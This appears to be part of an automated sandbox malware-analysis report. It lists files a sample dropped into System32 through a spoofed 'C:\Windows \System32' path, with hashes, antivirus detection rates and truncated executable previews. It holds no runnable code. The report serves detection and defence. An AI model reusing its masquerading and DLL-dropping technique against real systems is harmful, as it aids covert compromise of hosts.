          SSDEEP:1572864:A3zXXlu6Lhy1Oq8MPo+SbzfyS/YTP7ce0Lkvj8SrcaMAVnjRg256RILiFxJaiYUz:A3LXlXhy178MA/aS/YbXAkvj3cCVntgM
          MD5:B82F365E70C125AEFD791621BA8D8C67
          SHA1:49107FD07F9136CC653D81437BA4BB6359C1E1FD
          SHA-256:DE83854E2D6164FE087233F781655545137D9506CAA4CCBF780B11D370898F62
          SHA-512:09F0796265A6C6F56E8CE2E00C07A6EBB807B30318208304763F9C9F0426AE0690C2B7F8166A1803B541C9AD4A580ABCF1333D1E3AFA6F11ADE464663A37361D
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 54%
          • Antivirus: Virustotal, Detection: 42%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9).OXG.OXG.OXG.?.B..XG.?.C.CXG.?.D.GXG.OXG.NXG..&B.kXG..&C.@XG..&D.FXG.?.F.LXG.OXF..XG.m'N.LXG.m'..NXG.m'E.NXG.RichOXG.........................PE..d......f.........." ...$............P-....................................................`..................................................C..(...............3.................p"..8...........................0!..@...............x............................text...}........................... ..`.rdata...<.......>..................@..@.data...x ...P.......B..............@....pdata...3.......4...L..............@..@_RDATA..\...........................@..@.fptable...........................@....rsrc..............................@..@.reloc.............................@..B................................................................................................................................................

          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

          Download File
          Process:C:\Windows\System32\svchost.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):55
          Entropy (8bit):4.306461250274409
          Encrypted:false
          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
          MD5:DCA83F08D448911A14C22EBCACC5AD57
          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
          Malicious:false
          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

          C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

          Download File
          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:modified
          Size (bytes):2464
          Entropy (8bit):3.247255297360145
          Encrypted:false
          SSDEEP:24:QOaqdmuF3rd+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxwx:FaqdF7d+AAHdKoqKFxcxkFN
          MD5:C4F71E70C8BA9413A17C981A3347B21E
          SHA1:4452902E7372C109AE5D937A3BEA8D0CA0593CBC
          SHA-256:961E3945238C2651363793A4EFB25FD77F06A578837867E6B59052CDBF3EF6E2
          SHA-512:7B9B3E116D55493168FA82673E02F3180BAFBE5BB99AB0C389026127A0EFF93E384343AA71E87879135EC87DC00E6958BBB69959D98E474315F30807D7B9E771
          Malicious:false
          Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. A.u.g. .. 3.0. .. 2.0.2.4. .0.1.:.4.0.:.1.3.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

          C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:modified
          Size (bytes):20756
          Entropy (8bit):5.609056368741965
          Encrypted:false
          SSDEEP:384:5yBrkgG9FZfVQXhr7FvLRn40DQjYjPraz3U6eGbwTgqC:QriFUXhrNLRRcjw4kJGb5qC
          MD5:242EB5FFBEC2B5C2827B2E62ED4A0488
          SHA1:2FED693EDC967488F0A2064E6635B050BA1A372B
          SHA-256:D0D989007D9A4849886CBE447500D1BC0B84865A7C42FF30544593564E9406C6
          SHA-512:C27467A8E81B5ABA88112B7F26189C806F991A1EF7996F44A81A10CFA6C0283ACF512A6BB176886C592430166390E064B8CBED7BD2184DF3697E68FB0FAF1C21
          Malicious:false
          Preview:@...e...................d.............n...G..........@..........H...............o..b~.D.poM...:..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....L.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.{.....#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

          C:\Windows\System32\console_zero.exe

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):482304
          Entropy (8bit):6.5776793475761295
          Encrypted:false
          SSDEEP:6144:1tykCor45CbWLFv49UnD0JsB+eabiNQBph0lhSMXlBXBWnvKV9Rd08LFIPq:eorH8NQJ++eZNAph0lhSMXliv49I8L0
          MD5:7D5124735B17F17AB3DACBA515C397F0
          SHA1:77AAA30168B037BE7013C39A1E744F12A4CF20B6
          SHA-256:DFC94E4B35878172723123269F3DA1BA7854BD4F58F8FBF4C3E4CA20D822BF4A
          SHA-512:84A7DBDFBD8B592A75D7A55A88D7073ABAF1023305853652DA09FB9BE4DC7A8C0C57377CBDB8EE0E0D85DB70EB0296452D02F44C00647B51D15D51C8AC44C91B
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 75%
          • Antivirus: Virustotal, Detection: 72%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-{.[L.G[L.G[L.G+..F.L.G+..FIL.G+..F]L.G...FQL.G...FJL.G...F.L.GH..FYL.G+..F^L.G[L.G.L.GN..FYL.GN..GZL.GN..FZL.GRich[L.G........................PE..d......f.........."....(.............#.........@..........................................`.................................................<...P............P...7......................8..............................@...............p............................text...|........................... ..`.rdata...6.......8..................@..@.data....1..........................@....pdata...7...P...8..................@..@.fptable.............L..............@....rsrc................N..............@..@.reloc...............P..............@..B........................................................................................................................................................................................

          C:\Windows\System32\libcrypto-3-x64.dll

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):4684800
          Entropy (8bit):6.761708409908653
          Encrypted:false
          SSDEEP:98304:E1+WtBcda7nzo7Vd8qQQPQ1CPwDvt3uFGCC:gXtBcda7nzo7Vd8qQQY1CPwDvt3uFGCC
          MD5:158F0E7C4529E3867E07545C6D1174A9
          SHA1:9FF0CCCB271F0215AD24427B7254832549565154
          SHA-256:DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
          SHA-512:51E79D8D0AB183046F87AA659973B45147BB1E1AE8883F688C615CCB18BF9FCCB8779DD872B01748BACD56E141BC096C2BB4CCF32EBD7A49ADC76363355E40FE
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%, Browse
          Joe Sandbox View:
          • Filename: Ld0f3NDosJ.exe, Detection: malicious, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............vI..vI..vI..I..vI;DwH..vI;DsH..vI;DrH..vI;DuH..vI..wI*.vI..wH..vI..vI..vI.GrHl.vI.GvH..vI.G.I..vI.GtH..vIRich..vI........PE..d...d.Lf.........." ...'..4..........4.......................................G...........`...........................................A. ... @D.@....0G.......D.LH...........@G.L.....?.T.............................?.@.............4..............................text...8.4.......4................. ..`.rdata..*.....4.......4.............@..@.data....t...`D..J...JD.............@....pdata..LH....D..J....D.............@..@.rsrc........0G.......F.............@..@.reloc..L....@G.......F.............@..B................................................................................................................................................................................................................................................

          C:\Windows\System32\libcurl.dll

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):561152
          Entropy (8bit):6.383490918799092
          Encrypted:false
          SSDEEP:12288:0u3rEnX6Gtd3+XZRnRNvNu86p07GZiDnwXA3qGueVW08G:d7EnX/L3+p7NvNu8OqnwXA3qGueVWG
          MD5:93F8F5133ED40262B9FD437915718B82
          SHA1:A18E34F2E1ECADA88249D5B6A87F137A2A1E5041
          SHA-256:78993F8E7AC2D139A8B7198F229D8EF1BA2000D7EB1B07FB7AA4FCCCF7786151
          SHA-512:E1F15B6CEE766D02823938B38BB580C7EFF94E0F4CD907AC4676A65BBC4A9632B5DB0CA54D7B8E6E14042510720E063C00C538DEA3DCBD56C94C65EEADCFCB26
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1i[.u.5Pu.5Pu.5P|p.Pg.5P..4Qw.5P...P}.5P..6Qq.5P..1Q}.5P..0Qx.5Pe.4Qw.5Pu.4P..5P>p4Q~.5Pe.1Q..5Pe.5Qt.5Pe..Pt.5Pu..Pt.5Pe.7Qt.5PRichu.5P........PE..d....,Of.........." ...(.Z...<.......]....................................................`.........................................@.......H...T............`..(S..............X.......T..............................@............p...............................text...8X.......Z.................. ..`.rdata......p.......^..............@..@.data...(0... ...(..................@....pdata..(S...`...T...*..............@..@.rsrc................~..............@..@.reloc..X...........................@..B................................................................................................................................................................................................................................

          C:\Windows\System32\libiconv-2.dll

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):1851113
          Entropy (8bit):6.295735352298234
          Encrypted:false
          SSDEEP:24576:SAlxpPnBAUZLY9OVbbTiZGavkg3NyeuQ6l9fH+f2ykqZrkgecviRd7mQFz:DPnBAUZLY9OEZGaXBuQQ9e2YYUQFz
          MD5:158BC77453D382CF6679CE35DF740CC5
          SHA1:9A3C123CE4B6F6592ED50D6614387D059BFB842F
          SHA-256:CF131738F4B5FE3F42E9108E24595FC3E6573347D78E4E69EC42106C1EEBE42C
          SHA-512:6EB1455537CB4E62E9432032372FAE9CE824A48346E00BAF38EF2F840E0ED3F55ACAEE2656DA656DB00AE0BDEF808F8DA291DD10D7453815152EDA0CCFC73147
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.Jd....q.....& ..."............P..........f............................................. .................................................D....@..........d............P..................................(.......................p............................text..............................`.P`.data...............................@.P..rdata..............................@.`@.pdata..d...........................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..D...........................@.0..CRT....X.... ......................@.@..tls.........0......................@.@..rsrc........@......................@.0..reloc.......P......................@.0B/4...... ....`......................@..B/19.....m....p... ..................@..B/31......2.......4..................@..B/45.....

          C:\Windows\System32\libintl-9.dll

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):475769
          Entropy (8bit):5.442192544327632
          Encrypted:false
          SSDEEP:12288:YoSRYqB/kDraXbQTNRC6RsclS8DzT6Bam:+YY/kDraLQTNRCPWDzT6Bam
          MD5:E79E7C9D547DDBEE5C8C1796BD092326
          SHA1:8E50B296F4630F6173FC77D07EEA36433E62178A
          SHA-256:1125AC8DC0C4F5C3ED4712E0D8AD29474099FCB55BB0E563A352CE9D03EF1D78
          SHA-512:DBA65731B7ADA0AC90B4122C7B633CD8D9A54B92B2241170C6F09828554A0BC1B0F3EDF6289B6141D3441AB11AF90D6F8210A73F01964276D050E57FB94248E2
          Malicious:false
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......[.H........& .....D....................(h....................................0......... ......................................................@..8....................P..p........................... 0..(....................................................text...8C.......D..................`.P`.data........`.......J..............@.`..rdata..0M...p...N...L..............@.`@.pdata..............................@.0@.xdata..d...........................@.0@.bss....P.............................`..edata..............................@.0@.idata..............................@.0..CRT....X.... ......................@.@..tls....h....0......................@.`..rsrc...8....@......................@.0..reloc..p....P......................@.0B/4...........`......................@.PB/19..........p......................@..B/31.....1:.......<..................@..B/45.....

          C:\Windows\System32\libpq.dll

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):327168
          Entropy (8bit):6.055910692008984
          Encrypted:false
          SSDEEP:6144:veJ/i9L1mle2NwGTQ46ZEEKN4zP2/SHzI4l/4OMx7apSPIYuh0L/iXmJ:gmV2NwQQ3G4zP22rOIy
          MD5:EF060E5C414B7BE5875437FF2FB8EC54
          SHA1:6DCF04DFF9B25BE556EC97660F95ACF708C0C870
          SHA-256:E6ACED8D30471F35B37ABBF172CE357B6A8F18AF5FEB342B6CFFC01D3378F2B4
          SHA-512:67BFF321BA901A0B0DC0F6C4A723D7DF35418F593E16E6193673CCE5190D76355409F676C1EA5D0CB46493F5735209089A3A52D3D716EB8187BF6E846792E2E8
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%, Browse
          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........t3R..`R..`R..`[..`D..`To.aP..`To.`T..`To.a_..`To.aZ..`To.aV..`...a^..`n..aU..`R..`K..`=o.ag..`=o.aS..`=o.`S..`R.`S..`=o.aS..`RichR..`........................PE..d.....:f.........." ...&.l...........e.......................................@............`...@...................................................... ..........,"...........0.......k..T...........................pj..@...............p............................text...xj.......l.................. ..`.rdata..vT.......V...p..............@..@.data...............................@....pdata..,".......$..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................

          C:\Windows\System32\libssl-3-x64.dll

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):818176
          Entropy (8bit):6.269258421632734
          Encrypted:false
          SSDEEP:12288:NGbc08emtUas2F158w1T4qLgl85MNRlqnZ5ydEVB3i:NGoL9W0lJ5cR9dEVB3
          MD5:69D0FEE0CC47C3B255C317F08CE8D274
          SHA1:782BC8F64B47A9DCEDC95895154DCA60346F5DD7
          SHA-256:BA979C2DBFB35D205D9D28D97D177F33D501D954C7187330F6893BB7D0858713
          SHA-512:4955252C7220810ED2EACA002E57D25FBC17862F4878983C4351C917CF7873EB84AE00E5651583004F15A08789BE64BDB34FF20CB0E172C9C1376706DEB4AA1A
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.'.c...O..s...O..|...O..y...O..u..:...u...L..r..q..*...L......L..p...LK.p...L..p..Richq..................PE..d...d.Lf.........." ...'..................................................................`..........................................0...K...{..................Hr..............\.......T...............................@............................................text...X........................... ..`.rdata..L...........................@..@.data...8=.......8..................@....pdata..Hr.......t..................@..@.rsrc................`..............@..@.reloc..\............d..............@..B........................................................................................................................................................................................................................................

          C:\Windows\System32\libwinpthread-1.dll

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
          Category:dropped
          Size (bytes):52736
          Entropy (8bit):5.840253326728635
          Encrypted:false
          SSDEEP:768:fE20UsQSmxsJ/jPxsiFFnoCImovqcyz88rtYNChvThLaim3Yu/g/D8:cis0sP5FBQ7vU9BYshtaim3Yuo78
          MD5:9DC829C2C8962347BC9ADF891C51AC05
          SHA1:BF9251A7165BB2981E613AC5D9051F19EDB68463
          SHA-256:FFE2D56375BB4E8BDEE9037DF6BEFC5016DDD8871D0D85027314DD5792F8FDC9
          SHA-512:FD7E6F50A21CB59075DFA08C5E6275FD20723B01A23C3E24FB369F2D95A379B5AC6AE9F509AA42861D9C5114BE47CCE9FF886F0A03758BFDC3A2A9C4D75FAB56
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....|.....................d.............................P................ ......................................................0..P....................@..h........................... ..(....................................................text...({.......|..................`.P`.data...............................@.P..rdata..............................@.P@.pdata..............................@.0@.xdata..............................@.0@.bss..................................p..edata..............................@.0@.idata..............................@.0..CRT....`...........................@.@..tls....h.... ......................@.`..rsrc...P....0......................@.0..reloc..h....@......................@.0B................................................................................................................................

          C:\Windows\System32\ucrtbased.dll

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):1786880
          Entropy (8bit):6.056894707447503
          Encrypted:false
          SSDEEP:24576:JUV0C8E3W4JoceLErS6P0qoc6uoPrT5PgVBHmaw+zrGOzli7Gi0m9ZRXyYk:i8/B90ozghlGJ7js
          MD5:C3130CFB00549A5A92DA60E7F79F5FC9
          SHA1:56C2E8FB1AF609525B0F732BB67B806BDDAB3752
          SHA-256:EEE42EABC546E5AA760F8DF7105FCF505ABFFCB9EC4BF54398436303E407A3F8
          SHA-512:29BAB5B441484BDFAC9EC21CD4F0F7454AF05BFD7D77F7D4662AEAEAA0D3E25439D52AA341958E7896701546B4A607D3C7A32715386C78B746DFAE8529A70748
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'.S.c.=.c.=.c.=.j...P.=.c.<...=..}.b.=..}.S.=..}.'.=..}...=..}.u.=..}.b.=..}.b.=.Richc.=.........PE..d...~.!U.........." .................................................................g....`A........................................p........C..................x................... ...............................`...................H............................text............................... ..`.rdata...x.......z..................@..@.data...(Z...`...$...J..............@....pdata..x............n..............@..@.rsrc................2..............@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................

          C:\Windows\System32\usvc.dat

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):13693952
          Entropy (8bit):6.54885571275157
          Encrypted:false
          SSDEEP:393216:9PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRC1qoxlXnwXAaGueVWTXSdEVB3:9ITkUqX
          MD5:6F697D05D9A3A01056706D2220010056
          SHA1:12DCAC1D8DA0EF5637D41B73B7557E57C4323707
          SHA-256:CAAA8F84036A5AFAFF525968364CBFCFB31E5E1EC9A856535BF3A25A279BA027
          SHA-512:7AE5220E85946BC0EDF08DB9E42795B65ADE5AC70C36679C4F7803847591EB819B96A4EB65C001CEDF3B4DBD0C1488D875DD14AE5B4EDE08B7B5218EE06C7476
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 96%
          • Antivirus: Virustotal, Detection: 57%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w.U.w.U.w.U...TJw.U...T.w.U...T.w.U.w.U.w.UA..T.w.UA..T.w.UA..T.w.U...T.w.U.w.UAw.U...T.w.U..XU.w.U...T.w.URich.w.U........................PE..d......f.........." ...$.*..................................................`............`.....................................................<....@...........,...........P.......L..8...........................pK..@............@..H............................text....(.......*.................. ..`.rdata...p...@...r..................@..@.data....-..........................@....pdata...,..........................@..@_RDATA..\.... ......................@..@.fptable.....0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................

          C:\Windows\System32\vcruntime140d.dll

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):131920
          Entropy (8bit):6.0574531251583865
          Encrypted:false
          SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
          MD5:F57FB935A9A76E151229F547C2204BBA
          SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
          SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
          SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
          Malicious:false
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].AB<..B<..B<....h.@<....L.A<..B<..l<..yb..I<..yb..V<..yb..Z<..yb..C<..yb\.C<..yb..C<..RichB<..................PE..d....LZW.........." .....j...\......pg....................................... ...........`A...........................................4.......<.......................P?......t...p...T...........................................................................text....h.......j.................. ..`.rdata..F5.......6...n..............@..@.data...............................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................

          C:\Windows\System32\winsvcf\winlogsvc

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:data
          Category:dropped
          Size (bytes):432
          Entropy (8bit):7.582504944413675
          Encrypted:false
          SSDEEP:12:KJEuM/0D/giPRiMSWnRRqya0XxJNN/QS2:juF/giPSGRTXXxDeS2
          MD5:3B11E9BFFD60AFB6D4498788EB1D42D1
          SHA1:D096E69CFB6C7397C50F039CB6D106948AFAA076
          SHA-256:B3181E588E17526001C5344F3702B71AB792FE44D0DAD2D6EF6DFECA991A38AD
          SHA-512:7CE0E335E73034C12831D46207FF6BF68CCFE4C58FD188ECE298054EC6F8893A8CB459C29C400E18DE144A78F48BF8E579783A157CBB2CAAA1CA97A70C8F6C41
          Malicious:false
          Preview:g...E.....!P..j..).....4...G...6._"{.2Y".p.........H..O.t...9y^.'F\...G.{|.i..-3.E,..........tE{.r.q......<Uw-.KX0........Q....2CR2.r......C%.<..X.}"r....`1......{z...RMh.!.+.~...?.-g8G...........J.>.....#..Hi.K..b..c*..K.a.@.5..Z.]...*Th..+...'>..Cei.Qo"3w..5..3g..5.R.K....jB.3.l...H..A.~.kA..$........^...Z.`E..L!..8..C5D.]...}..5.-....4.....M........=...kW...R...,..jh.7P.'.. .l....@.A_.D.{e.[...+...?.)K..

          C:\Windows\System32\x338625.dat

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):1677824
          Entropy (8bit):6.533586639135605
          Encrypted:false
          SSDEEP:24576:Y0H7N6lppKzx8h0Uy+IGQUhBjL3ukNZylxh0lhSMXlQw0FeaUpqXh0lhSMXl6hhv:Y0H7N8ZhBjL3PJ2FeaV24Qg
          MD5:7A5F4358BE90975402B3F49CD85D8A2E
          SHA1:EE6FDDEDDC8DE2AD63EEBA340A930255A96F0D01
          SHA-256:A6FFC6D42A34A6A9EB26C4BDA36740024004276C2F2FFB46B7DDD4E7F512AE7E
          SHA-512:877835C194224FCE6CBD67444BE557495CBE0BAEF80284B4EA2E84494E754886670B33FFA75F24AD1103CE2D1A1CA13F6E00AD10B2CBC6A663FFA631B22296F5
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 79%
          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........I...'B..'B..'B.."C?.'B..$C..'B?,$C..'B?,#C.'B?,"C..'B.+&C..'B..#C.'B..&C..'B.+"C.'B.+$C..'B..&C.'B..&B.'B.+.C.'B.+'C..'B.+.B..'B.+%C..'BRich..'B........PE..d...N..f.........." ...(.............!....................................................`............................................P...@................@..................X.......8.......................(.......@............................................text...4........................... ..`.rdata.............................@..@.data....}.......J..................@....pdata.......@......................@..@.fptable.............~..............@....rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................

          C:\Windows\System32\zlib1.dll

          Download File
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):90624
          Entropy (8bit):6.511410074418791
          Encrypted:false
          SSDEEP:1536:EarCl5V5lEwda1RnSbFfbpYwayRyivl9bEKIOcIOZgyZ6rM3SIryPoIKr:EKcV5lEwUbShbpbaCpvsYSZgU6A3SIrf
          MD5:BB78414FB31B53EF8FAD8AFBEDBB834C
          SHA1:2CA62ED9A628E17887C0C9E5C07A2CC44B926EF8
          SHA-256:AE8951AD96124A39B63610D7A5A53B446FC7F19151AC1D8E5AC15E8C88227EBF
          SHA-512:9244CDF4EB86AE4071A74D584D170AC3D8F414F13EF3E9E8988C49B3488DC6FA1BB4DBB771635F145AE06484421C1101D120F63D34F3C479CD5F1FF9AAA646AF
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................[...a!....a!5...a!....a!....a!..............&....&....&7..._...&....Rich............................PE..d....,Of.........." ...(..................................................................`..........................................O......`W..........P....p..X...............l....>..T...........................`=..@...............x............................text............................... ..`.rdata...m.......n..................@..@.data........`.......L..............@....pdata..X....p.......N..............@..@.rsrc...P............Z..............@..@.reloc..l............`..............@..B........................................................................................................................................................................................................................

          C:\Windows\Temp\__PSScriptPolicyTest_0ghp043h.dmh.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Windows\Temp\__PSScriptPolicyTest_4lstyury.hfh.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Windows\Temp\__PSScriptPolicyTest_adgvbmpi.iw2.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
